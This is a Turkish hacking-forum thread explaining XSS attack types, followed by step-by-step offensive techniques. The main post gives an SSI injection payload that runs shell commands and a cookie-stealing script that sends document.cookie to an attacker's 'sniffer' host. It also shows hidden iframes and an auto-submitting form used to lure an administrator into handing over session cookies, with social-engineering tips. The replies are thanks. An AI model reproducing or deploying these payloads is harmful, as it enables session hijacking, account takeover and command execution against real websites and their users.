Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSS Açıkları Hakkında
#1
XSS Nedir?

Cross site scripting (XSS), bilgisayar güvenlik açığı. HTML kodlarının arasına istemci tabanlı kod gömülmesi yoluyla kullanıcının tarayıcısında istenen istemci tabanlı kodun çalıştırılabilmesi olarak tanımlanır.

XSS Açığı Nasıl Bulunur?
XSS Açıgını tespit etmek için text kutucuguna bir Html kodu yazmalıyız biz buna alert koduda diyebiliriz.Örnek olarak Alert Kodu "<script>alert.(yildiz)</script>" Enterladıgımızda tarayıcı ekranımıza açılır pencerede "yildiz" yazısı görünecektir.
Böylelikle Sitemizde XSS açıgı oldugunu tespit etmiş olduk.

Simdi XSS Açıgını linkimize bakarakta anlayabiliriz.XSS açıkları genelde GET methodlarında olur GET methodu id=12 gibi sayilardan olusan linklerdir.SQL açiklarida bu linklerde bulunur sqlmap bazen url tararken "xss vuln detected" tarzinda yazabilir dikkat ederseniz xssleri oradanda kesfedebilirsiniz.
Örnek olarak
örneksite:com/search.php?id=26363
sitemizin sonundaki sayı deverini silelim "id=" kısmından sonrasına "<script>alert.(yildiz)</script>" alert kodumuzu yazalım yine hatamızı verecektir.
Aynı zamanda anlatımını yaptığım Acunetix programı ile de bulabilirsiniz.
www.deccal.org

XSS Saldırı Çeşitleri:

-Reflected XSS: Bu saldırı tipi açıklık bulunan sitede uygun alanlara yazılan javascript kodlarının çalıştırılması ile olur.Burada sadece saldırı yapan kişi etkiyi görebilir ziyaretçilere etki edemez. Peki bunu nasıl atak haline getireceğiz. Burada sosyal mühendislik becerisi devreye giriyor. Email kullanarak hedeflere oluşturduğunuz zararlı linki bir şekilde tıklattırmanız ve kendi sunucunuza yönlendirmeniz gerekiyor. Burada saldırgan sizin sitede mevcut olan cookie bilgilerinizi çalabilir.



Stored XSS: Bu saldırı tipi reflected xss saldırısına göre daha çok tehlikelidir. Saldırgan açıklık bulduğu alana zararlı javascript kodlarını ekleyerek veritabanına kaydeder. Veritabanına kaydedilen veriler siteyi ziyaret eden herkese etki eder. Saldırganın koduna göre ziyaretçi etkilenme alanı değişir.


DOM XSS Saldırısı: DOM XSS saldırısı en tehlikeli XSS saldırı türüdür. JavaScript kodlarının zararlı bir şekilde kullanılması ile yapılır. Bu saldırı türünde kullanılan DOM nesneleri ile hedef web sitesinin index’i değiştirilebilir, sayfanın kodları ile oynanabilir, virüs, trojan gibi zararlı kodlar sayfaya entegre edilebilir. Sitede gezinirken sizi başka sayfaya yönlendirebilir.ISS kodlarıyla tehlikeli saldırılar yapılabilir.
www.deccal.org

XSS Açıklarının Bize Getirileri:



1) SSI Injection

SSI (server side include) shtml sayfaların çalışma mantığıdır. Sayfa html olsa bile yorum satırı arasına yazılan komutlar client side değil, server side olarak çalıştırılır.

Örnek kullanım şekli şudur;

<!--#echo var="DATE_LOCAL"-->

örneğin yukarıdaki satır bir .shtml sayfada bulunursa; veya sayfa shtml olmasa, php,asp,aspx ve hatta htmlolsa bile web application serverda SSI ayarları açıksa, ekrana sistem tarih saatini basacaktır.



Bu özelliği xss ile kombo çekersek sistemde komut çalıştırmamız mümkün olur.

örneğin;

http://site.com/index.php?ara=xss

açığımız olsun

http://site.com/index.php?ara=<!--#echo var="DATE_LOCAL"-->



gönderdiğimizde sayfada tarihi görüyorsak SSI komutları çalıştırabiliriz demektir.

SSI komutlarına aşağıda detaylı bi şekilde erişebilirsiniz;

http://www.w3.org/Jigsaw/Doc/User/SSI.html

ama benim favorim;

<!--#exec cmd="ls -la"-->



Not: Dom xss te çıktılar javascript üzerinden alınıp tarayıcı tarafından üretildiği için, doğrudan response a yansımadığı için SSI injection'a çevirme lüksüne sahip değiliz.





2) COOKIE Çalma;

Bildiğiniz üzere XSS ile javascript çalıştırabiliriz, bu da demektir ki javascript üzerinden erişilebilen her şeye erişebiliriz.

Buna document.cookie nesnesi de dahil.

Peki cookie yi nasıl çalarız?



Açıklı parametre GET metodu ile alınıyorsa;

http://site.com/index.php?ara=<script src=http://sniffersitemiz.com/a></script>

Burada "a" sayfası kendi hazırladığımız javascripttir. Kullandığım snifferdan örnek verecek olursam şuna benzer bi kod barındırır;

i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?'+document.cookie+'  '+document.location



Burada javascript kodu üzerinden bir image nesnesi oluşturulur ve

http://sniffersitemiz.com/log.php?'+document.cookie+'  '+document.location

verileri img src edilir.

log.php sayfamızda ise dışarıdan gelen değerleri loglarız.

Bu sayede document.cookie ve document.location değerlerini loglamış oluruz.



<script src=http://sniffersitemiz.com/a></script> yerine

<script>i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?'%2bdocument.cookie%2b'  '+document.location</script>

kodunu da kullanabilirdik, burada amaç karmaşıklığı azaltmak ve mümkün olduğunca özel karakter kullanmamak.



Peki bunu admine nasıl tıklatırız?

Adama doğrudan

http://site.com/index.php?ara=<script src=http://sniffersitemiz.com/a></script>

şeklinde link atarsanız muhtemelen tıklamayacaktır.

Onun yerine 2 farklı yöntem kullanabilirsiniz

1. yöntem "ara=" dan sonraki tüm karakterleri hex formatında yazmaktır. Ancak çoğu tarayıcı artık özel karakterler dışındakileri hex formatında yazsanız da karakter olarak gösterdiğinden eskisi gibi iş görmüyor.

Onun yerine en mantıklısı size ait bir sitede sayfaya şuna benzer bir kod eklemenizdir;

<iframe src="http://site.com/index.php?ara=<script src=http://sniffersitemiz.com/a></script>" height=0 width=0>



Daha sonra adama http://benimsitem.com/sayfa.html şeklinde iframe kodlu sayfanın linkini atmaktır.



POST metoduyla alınan parametre üzerinde var olan XSS açığının kullanımı;

Örneğin xss imiz "ara" parametresini get değil de post metodu ile alıyor olsun;

POST dedimmi akla "form" gelir.

Önce şu şekilde bir form hazırlarız;

<form action="http://site.com/index.php" method=post>

<input name=ara value="<script src=http://sniffersitemiz.com/a></script>">

</form>



Bu formu hazırlasak bile açıldığında kendi kendine post yaptırmamız lazım. O yüzden şu javascript kodunu da sayfanın sonuna ekliyoruz.

<script>

document.forms[0].submit();

</script>

Bu kod sayfa ziyaret edildiği anda formu otomatik post yapacaktır.



<form action="http://site.com/index.php" method=post>

<input name=ara value="<script src=http://sniffersitemiz.com/a></script>">

</form>

<script>

document.forms[0].submit();

</script>



Sayfamızı "xss.htm" olarak kaydettik ve sayfayı admine direk atmayacağımıza göre kendi sitemize yükledik.

"http://benimsitem.com/xss.htm" şeklinde linkimiz oldu.

Ancak bunu da admine direk attığımızda açar açmaz form yönleneceği için kıllanma ihtimali yüksek. Tekrar iframe li sayfa hazırlıyoruz.



<iframe src="http://benimsitem.com/xss.htm" height=0 width=0>



ve bu kodu örneğin index.html sonuna ekliyoruz.
Admine http://benimsitem.com linkini atıyoruz ve admin tıkladığında arka planda cookie'ler bize geliyor.



Konuda çeşitli sitelerden ve pdflerden faydalandım lütfen emeğe saygısızlık etmeyiniz.


Beğenenler: OrJiNaL
#2
Emegine Saglık
Beğenenler:
#3
Güzel Kaliteli Makale olmuş. Teşekkürler.
Bilgilerin dogru olup olmadığını inceleyecegim.
www.deccal.org


Beğenenler:
#4
Teşekkür ederim. Tabiki inceleye bilirsiniz.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WifiSlax Hakkında Geniş Döküman Dark-Capar 1 85 23-08-2016, Saat: 09:45
Son Yorum: KingSkrupellos
  Güvenlik Açıkları Geniş Anlatım elzarra 5 246 31-01-2016, Saat: 21:43
Son Yorum: archavin
  Web Güvenlik Açıkları // Soru-Cevap HIDR4 41 3,912 30-01-2016, Saat: 17:01
Son Yorum: KeşapLı
  Deep Web Hakkında En Çok Sorulan Sorular Nelerdir ? byhakan 1 168 14-01-2016, Saat: 14:43
Son Yorum: CyberAngel
  IP Board script hakkında görüşleriniz ZepZeki 6 559 19-03-2015, Saat: 16:18
Son Yorum: By!MaTRiX
Anahtar Kelimeler

XSS Açıkları Hakkında indir, XSS Açıkları Hakkında Videosu, XSS Açıkları Hakkında Online izle, XSS Açıkları Hakkında Bedava indir, XSS Açıkları Hakkında Yükle, XSS Açıkları Hakkında Hakkında, XSS Açıkları Hakkında Nedir, XSS Açıkları Hakkında Free indir, XSS Açıkları Hakkında Oyunu, XSS Açıkları Hakkında Download


1 Ziyaretçi